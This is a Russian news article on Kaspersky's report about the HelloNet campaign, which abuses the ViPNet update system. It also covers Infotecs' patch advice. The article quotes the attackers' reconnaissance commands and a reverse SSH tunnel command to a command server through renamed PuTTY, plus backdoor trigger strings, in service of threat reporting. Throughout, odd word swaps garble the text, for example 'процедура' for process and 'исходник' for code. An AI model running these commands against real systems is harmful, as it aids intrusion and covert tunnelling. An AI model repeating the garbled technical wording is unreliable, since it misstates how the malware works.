Кампания HelloNet использует систему обновления ViPNet для закрепления и загрузки вредоносных модулей

5 мин

Специалисты «Лаборатории Касперского» выявили кампанию HelloNet. В ней злоумышленники используют новые вредоносные модули и систему обновления ViPNet. Атака началась не позднее мая 2026 года и продолжалась на момент публикации исследования.

Целями стали крупные российские организации из государственного, энергетического, транспортного, образовательного и логистического секторов. Под удар также попали промышленные предприятия. Это не первый случай атак на компьютеры в сетях ViPNet. В 2025 году специалисты «Лаборатории Касперского» нашли бэкдор, который маскировался под обновления ViPNet.

В одной из заражённых систем исследователи обнаружили файл wtsapi32.dll. Он находился в папке C:\Program Files (x86)\InfoTeCS\VIPNet Update System. Эта папка относится к системе обновления ViPNet. Злоумышленники использовали DLL Sideloading. Файл системы обновления itcsrvup64.exe загружается при запуске Windows и может подхватить вредоносную библиотеку из этой папки. Так атакующие пытались закрепиться в системе.

Файл wtsapi32.dll содержит загрузчик HelloInjector. Он внедряет свой код в процедура svchost.exe и запускает следующую нагрузку. Сначала HelloInjector проверяет имя процесса, в котором работает. Если это не svchost.exe, он просматривает все запущенные процессы. Загрузчик ищет процесс, в имени которого есть svchost, а в командной строке — netsvcs.

После этого HelloInjector внедряет код в найденный процедура. Для этого он использует функции NtWriteVirtualMemory и NtCreateThreadEx. В новом процессе загрузчик снова проверяет имя процесса. Если тест проходит, он загружает и запускает вредоносный код из своей памяти. Этот исходник хранится в теле загрузчика в открытом виде.

Основную нагрузку исследователи назвали HelloProxy. Она работает как скрытый прокси-сервер и загрузчик новых модулей с командного сервера. HelloProxy перехватывает функции NtDeviceIoControlFile, closesocket и shutdown. Для этого он использует библиотеку Microsoft Detours.

Обработчики closesocket и shutdown не дают закрыть сокеты, которые вредонос использует для связи с сервером управления. Основной исходник находится в обработчике NtDeviceIoControlFile. Он перехватывает запросы AFD_RECV (0x12017) и AFD_GET_TDI_HANDLES (0x12037).

Эти запросы используются при работе с сокетами. Их перехват может помешать защитным средствам в пользовательском режиме фильтровать сетевые соединения. «Лаборатория Касперского» сообщила, что её продукты видят такую активность и блокируют попытки заражения.

Обработчик AFD_GET_TDI_HANDLES регистрирует сокеты. Обработчик AFD_RECV разбирает входящий трафик. Каждое сообщение, которое вызывает обработку AFD_RECV, вредонос записывает в файл C:\users\public\tesh4RPC.txt. Формат записи: threadid: pid=\r\n.

После установки перехватчиков HelloProxy начинает прослушивать порты 5003 и 5060. Он ждёт команды от сервера управления. Для проверки соединения модуль отправляет через сокет два байта 0x0502. Затем он ждёт сообщение со строкой ASDFASFSAFASDF. После этого HelloProxy начинает принимать команды.

Компонент может работать как прокси. В этом режиме он получает строки вида адрес:порт, создаёт новые сокеты и передаёт трафик между ними. Равным образом он может скачивать новые модули. HelloProxy получает исполняемый файл от командного сервера, загружает его в хранилище своего процесса и запускает в отдельном потоке.

Исследователи нашли две нагрузки, которые были внедрены в svchost.exe. Вероятно, их запустил HelloInjector. Первая нагрузка получила название HelloExecutor. С её помощью атакующие выполняли команды на заражённой машине. Второй компонент назвали HelloCleaner. Он очищал журналы ViPNet и скрывал следы работы злоумышленников.

HelloExecutor применяли для разведки в сетях заражённых организаций. Атакующие проверяли активных пользователей, настройки сети, учётные записи, группы и папки ViPNet. Они выполняли следующие команды:

text query user ipconfig /all ping 8.8.8.8 -n 1 net user /do net group /do dir “C:\Program Files (x86)” dir “C:\Program Files (x86)\infotecs” dir “C:\Program Files (x86)\infotecs\ViPNet Administrator” dir “C:\Program Files (x86)\infotecs\ViPNet Client\Export” dir “C:\Program Files (x86)\infotecs\ViPNet Client” dir “С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export” dir "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network " dir c:\users[username] query user dir C:\Users\Public\music

Отдельно злоумышленники интересовались папкой C:\Users\Public\Music. На заражённых машинах они использовали её для запуска SSH-туннеля к серверу управления 5.39.253[.]206. Для этого они применяли переименованный файл легитимной утилиты PuTTY:

text C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]

На одной из заражённых систем также нашли бэкдор HelloBackdoor, написанный на Rust. Он принимает подключения на порту 443. Для запуска он ждёт строку 47c6235b4d2611184. Это вторая половина MD5-хэша строки hello\n.

После запуска HelloBackdoor поддерживает команды !upload, !down и !stop. Команда !upload загружает файл на заражённую машину. !down выгружает файл с неё. Команда !stop останавливает работу бэкдора.

Для этого HelloBackdoor создаёт и запускает BAT-файл. Файл удаляет указанный объект, останавливает службу iplircontrol, ждёт пять секунд и запускает службу снова. Если команда не совпадает с !upload, !down или !stop, бэкдор передаёт её в cmd.exe.

При изучении одного из образцов wtsapi32.dll специалисты нашли неиспользуемую строку HTTP-запроса с адресом news[.]sina[.]com. Этот адрес относится к китайскому новостному порталу Sina. В строках HelloBackdoor равным образом нашли сведения о загрузке пакетов Rust с зеркала mirrors[.]ustc[.]edu.cn во время сборки.

Эти следы могли остаться в файлах случайно. Одновременно злоумышленники могли добавить их намеренно, чтобы затруднить установление источника атаки. «Лаборатория Касперского» с низкой степенью уверенности связывает кампанию с неизвестной китайскоязычной APT-группой.

16 июля 2026 года организация «Инфотекс» равным образом сообщила о новом способе целевой атаки на сети ViPNet. Он связан с транспортным протоколом mftp в ПК ViPNet Client 4. Компания выявила проблему на узле с установленным ViPNet Administrator.

Атака возможна, если злоумышленники уже получили доступ к узлу ViPNet Administrator в доверенной сети. С такого узла они могут отправить специально подготовленный конверт через межсетевое взаимодействие. Конверт выглядит как легитимное апдейт и содержит вредоносный код.

Новая атака использует ошибку при обработке относительных путей. Ошибка позволяет нарушить целостность среды, повысить привилегии на атакуемом узле и выполнить произвольный исходник.

«Инфотекс» рекомендовала апдейтнуть сертифицированную сборку ViPNet Client 4 до версии 4.5.3, сборка 65211, или новее. Релизную сборку ViPNet Client 4 следует обновить до версии 4.5.5, сборка 24733, или новее. На момент публикации организация планировала выпустить эту версию в ближайшее время. ViPNet Administrator нужно обновить до версии 4.6.11.5113 или новее.

Если сеть связана с другими защищёнными сетями, за которые компания не отвечает, «Инфотекс» советует проверить свои узлы на признаки заражения. Для этого организация предлагает применять подготовленные YARA-правила и инструкцию по их запуску через утилиту YARA.

При обнаружении признаков заражения или подозрительной активности с узлов ViPNet в сторону координаторов и других систем инфраструктуры компания рекомендует обратиться в техническую поддержку «Инфотекс». Также она советует соблюдать правила работы с продуктами ViPNet, не давать пользователям права администратора, вовремя обновлять антивирусы и поддерживать актуальные версии продуктов ViPNet.

«Лаборатория Касперского» советует уделить больше внимания защите рабочих станций с ViPNet. Организация рекомендует отслеживать трафик на портах 5003 и 5060. Это поможет вовремя заметить признаки заражения.

Читают сейчас

«Уэбб» разглядел странную атмосферу на адской планете, покрытой лавой

1 час назад

«Уэбб» разглядел странную атмосферу на адской планете, покрытой лавой

С помощью космического телескопа НАСА имени Джеймса Уэбба учёные исследовали «суперземлю» 55 Cancri e (55 Cnc e) — обладающую экстремальными условиями каменную экзопланету, расположенную на расстоянии

Sunlu представила сушильную камеру для Bambu Lab AMS Lite

2 часа назад

Sunlu представила сушильную камеру для Bambu Lab AMS Lite

Китайская компания Sunlu представила сушильную камеру для системы многоцветной печати Bambu Lab AMS Lite, которая предназначена для 3D-принтеров A1, A1 mini и A2L. Девайс представляет собой короб для

Вышла стабильная релиз Android Studio Quail 2: поиск утечек памяти и инструменты для анализа сбоев

4 часа назад

Вышла стабильная релиз Android Studio Quail 2: поиск утечек памяти и инструменты для анализа сбоев

Google выпустила стабильную версию Android Studio Quail 2. Главными изменениями стали встроенный поиск утечек памяти, новые инструменты для анализа сбоев приложения и функция параллельно запускать нес

VK: сервисы VK и МАХ работают в нормальном режиме, установка и апдейт приложений доступны в RuStore и других маркетах

5 часов назад

VK: сервисы VK и МАХ работают в нормальном режиме, установка и апдейт приложений доступны в RuStore и других маркетах

В VK сообщили, что все приложения холдинга VK, в том числе MAX, «ВКонтакте», «Одноклассники», «Дзен», «VK Видео», «VK Музыка», сервисы Mail и другие работают в обычном режиме без ограничений. Читать д

В macOS обнаружили инфостилер CrashStealer, замаскированный под программа Apple

5 часов назад

В macOS обнаружили инфостилер CrashStealer, замаскированный под программа Apple

Исследователи Jamf Threat Labs обнаружили инфонстилер CrashStealer для macOS. Он маскируется под системное программа macOS и похищает пароли, файлы, связки ключей, данные браузеров и криптокошельков.